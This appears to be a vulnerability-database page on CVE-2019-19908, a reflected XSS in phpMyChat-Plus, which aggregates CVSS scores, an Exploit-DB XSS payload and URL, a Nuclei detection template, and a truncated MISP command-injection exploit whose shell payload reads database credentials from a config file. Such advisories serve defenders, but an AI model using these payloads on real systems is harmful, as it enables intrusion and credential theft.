CVE-2019-19908
Published 2019-12-20
Priority P3·48·medium·6.1 CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EXPLOIT
EPSS: 21.23% (97.3th percentile)
phpMyChat-Plus 1.98 is vulnerable to reflected XSS via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ciprianmp | phpmychat-plus | — | — |
CVSS provenance
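| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 6.1 | MEDIUM | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:P/A:N |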
No detection rules found.
Exploit-DB
phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
exploitdb·2019-12-20·CVSS 6.1
CVE-2019-19908 [MEDIUM] phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
---
```
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description:
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload:
">alert('xss')

Vulnerable URL:
http://localhost/plus/pass_reset.php?L=english&pmc_username=">alert('xss')
```
Exploit-DB
MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
exploitdb·2019-02-18·CVSS 8.8
CVE-2018-19908 [HIGH] MISP 2.4.97 - SQL Command Execution via Command Injection in STIX Module
---
```python
#-*-coding:utf-8-*-
#
# Exploit Title: SQL command execution via command injection in STIX module
# Date: 2019-17-02
# Exploit Author: Tm9jdGlz
# Vendor Homepage: https://www.misp-project.org/
# Software link: https://www.misp-project.org/download/
# Version: 2.4.90 - 2.4.99
# Tested on: 2.4.97
# CVE: CVE-2018-19908
#
# Use this payload as stix filename
def encode_data(data):
    from base64 import b64encode
    from urllib.parse import quote_plus
    b64Data = b64encode(data.encode("utf-8"))
    urlEncode = quote_plus(b64Data)
    return urlEncode
def generate_payload(SQLRequest):
    payload = 'MISPPath="../../";'\
    'MISPPDB="$MISPPath/app/Config/database.php";'\
    'MySQLUUser=$(grep -o -P "(? \').*(?=\')" $MISPPDB);'\
    'MySQLRUser=
```
Nuclei
phpMyChat-Plus 1.98 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2019-19908 [MEDIUM] phpMyChat-Plus 1.98 - Cross-Site Scripting
phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
Template:
```yaml
id: CVE-2019-19908
info:
  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: |
    phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to a patched version of phpMyChat-Plus or apply the necessary security patches to mitig
```
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
Wiz
CVE-2020-37151 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2020-37151 [MEDIUM] CVE-2020-37151 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2020-37151: phpMyChat Plus vulnerability analysis and mitigation
phpMyChat Plus 1.98 contains a SQL injection vulnerability in the deluser.php page through the pmc_username parameter that allows attackers to manipulate database queries. Attackers can exploit boolean-based, error-based, and time-based blind SQL injection techniques to extract sensitive database information by crafting malicious payloads in the username field.
Source: NVD

| Field | Value |
|---|---|
| Score | 8.8 |
| Published | February 5, 2026 |
| Severity | HIGH |
| CNA Score | 8.8 |
| Affected Technologies | phpMyChat Plus |
| Has Public Exploit | Yes |
| Has CISA KEV Exploit | No |
| CISA KEV Release Date | N/A |
| CISA KEV Due Date | N/A |
| Exploitation Probability Percentile (EPSS) | 25 |
| Exploitation Probability (EPSS) | 0.1 |

Affected packages and libraries
cpe:2.3:a:cipria